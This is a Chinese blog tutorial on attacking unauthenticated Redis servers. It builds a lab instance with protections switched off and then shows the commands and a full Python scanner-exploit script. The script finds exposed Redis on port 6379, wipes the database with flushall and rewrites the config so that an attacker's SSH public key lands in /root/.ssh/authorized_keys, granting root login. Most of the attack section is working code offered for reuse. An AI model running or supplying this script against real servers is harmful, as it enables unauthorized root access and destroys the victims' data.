python编写Redis漏洞检测和利用脚本

python编写Redis漏洞检测和利用脚本

环境配置

1
2
3
4
# wget http://download.redis.io/releases/redis-6.0.8.tar.gz
# tar xzf redis-6.0.8.tar.gz
# cd redis-6.0.8
# make

执行完 make 命令后,redis-6.0.8 的 src 目录下会出现编译后的 redis 服务程序 redis-server,还有用于测试的客户端程序 redis-cli:

下面启动 redis 服务:

1
2
# cd src
# ./redis-server

修改redis.conf,先注释掉bind 127.0.0.1这一行,允许远程登陆,同时关闭保护模式

6nJBwD.png

6nJDTe.png

使用修改后的配置文件启动

1
2
# cd src
# ./redis-server ../redis.conf

6nJ6fA.png

利用过程

修改数据库默认路径为/root/.ssh,默认缓存文件为authorized.keys,把目标主机缓存的公钥作为value保存在authorized.keys文件中,这样就在服务器端/root/.ssh下生成了一个授权的key

1.本地主机生成密钥key

1
ssh-keygen -t rsa

6nJdOK.png

2.在目录/root/.ssh下查看生成结果,并把公钥导入txt文件中

1
2
3
4
cd /root/.ssh
ls
(echo -e "\n\n"; cat id_rsa.pub;echo -e "\n\n") > key.txt
cat key.txt

6nJ0eO.png

3.把生成的公钥导入Redis缓存中

1
cat /root/key.txt | redis-cli -h xx.xx.xx.xx

4.连接到目标主机,更改配置文件路径为/root/.ssh,设置文件名称为authorized-keys

1
2
3
4
5
redis-cli -h xx.xx.xx.xx

config set dir /root/.ssh
Config set dbfilename authorized_keys
save

5.ssh连接到目标主机

1
ssh xx.xx.xx.xx

编写python脚本

github地址:https://github.com/sp4zcmd/SimpleRedisScanner

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import socket
import redis
import sys

def Usage():
    print('RedisScanner.py 127.0.0.1 key.txt')

def Scan(ip):
    payload="\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)
    try:
        s.connect((ip, 6379))
        s.sendall(payload.encode())
        recvdata=s.recv(1024).decode()
        if 'redis_version' in recvdata:
            print('[+] %s is vulnerable ' %ip)
            #print(recvdata)
            return True
    except:
        print('[-] %s is not vulnerable ' %ip)
        return False
        pass

def WriteSSHKeygen(ip,sshkey):
    try:
        r = redis.StrictRedis(host=ip, port=6379, db=0, socket_timeout=2)
        r.flushall()
        r.set('crackit', sshkey)
        r.config_set('dir', '/root/.ssh/')
        r.config_set('dbfilename', 'authorized_keys')
        r.save()
        print('[+] Write SSHkeygen successful')
    except:
        print('[-] Write SSHkeygen Failed')
        pass


if __name__=='__main__':
    if(len(sys.argv)==3):
        ip=sys.argv[1]
        sshkeyfile=sys.argv[2]
        try:
            with open(sshkeyfile, 'r') as f:
                sshkey = f.read()
        except:
            print('Read SSHkeygen Failed')
            pass

        if Scan(ip):
            WriteSSHKeygen(ip, sshkey)
    else:
        Usage()

运行测试

6nJay6.png

写入成功

6nJgSI.png

成功连接

6nJ2lt.png

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!